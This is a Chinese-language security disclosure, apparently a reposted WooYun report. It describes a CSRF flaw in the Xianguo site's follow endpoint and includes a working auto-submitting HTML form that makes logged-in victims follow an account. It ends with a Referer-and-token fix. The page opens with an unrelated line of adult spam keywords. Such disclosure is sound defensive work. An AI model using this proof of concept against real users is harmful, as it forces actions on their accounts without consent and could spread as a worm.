自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

鮮果網(wǎng)某處CSRF漏洞可蔓延蠕蟲

安全 漏洞
鮮果網(wǎng)某處CSRF漏洞,可能導(dǎo)致蠕蟲蔓延,在未經(jīng)用戶同意的情況下發(fā)布文字、加關(guān)注等等!

鮮果網(wǎng)某處CSRF漏洞,可能導(dǎo)致蠕蟲蔓延,在未經(jīng)用戶同意的情況下發(fā)布文字、加關(guān)注等等!

詳細(xì)說明:在接受POST和GET的信息的時候,未對POST來路(Referer)進(jìn)行驗(yàn)證,同時也沒有在POST的信息中加token驗(yàn)證信息的正確性,導(dǎo)致漏洞產(chǎn)生。

演示地址:http://in.imlonghao.com/WooYun-XXXXX/ (用戶名/密碼:imlonghao)

登錄狀態(tài)下訪問,會自動發(fā)一條名為Hello World的微博,并會關(guān)注一個用戶。

漏洞地址:http://xianguo.com/beings/follow

<html>

<body>

<form id="imlonghao" name="imlonghao" action="http://xianguo.com/beings/follow" method="post">

<input type="text" name="beingsIds" value="1378148" />

<input type="text" name="parentId" value="0" />

<input type="text" name="ftype" value="0" />

</form>

<script>

document.imlonghao.submit();

</script>

</body>

</html>

接口返回信息

鮮果網(wǎng)某處CSRF漏洞可蔓延蠕蟲

效果

[[97443]]

【發(fā)文字】

修復(fù)方案:

檢查POST來路Referer

在POST的信息中加token

責(zé)任編輯:藍(lán)雨淚 來源: 2cto
相關(guān)推薦

2011-08-31 14:38:40

2013-04-24 15:56:40

2015-02-10 13:24:27

CSRF漏洞CSRF

2014-07-17 15:47:52

2010-07-20 10:26:50

2013-12-02 13:34:55

2014-08-01 09:12:39

2009-11-09 19:59:47

2019-09-17 10:06:46

數(shù)據(jù)庫程序員網(wǎng)絡(luò)安全

2017-09-22 12:31:08

云計(jì)算容器容器蔓延

2014-12-30 14:02:54

2011-05-10 09:55:14

2014-06-12 13:44:19

2010-07-28 16:02:51

2015-03-06 17:02:51

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞

2015-03-10 18:07:53

2020-07-16 11:51:37

漏洞WindowsDNS服務(wù)器

2021-12-23 16:35:54

Apache Log4

2021-04-04 22:48:20

Linux網(wǎng)絡(luò)安全、漏洞
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號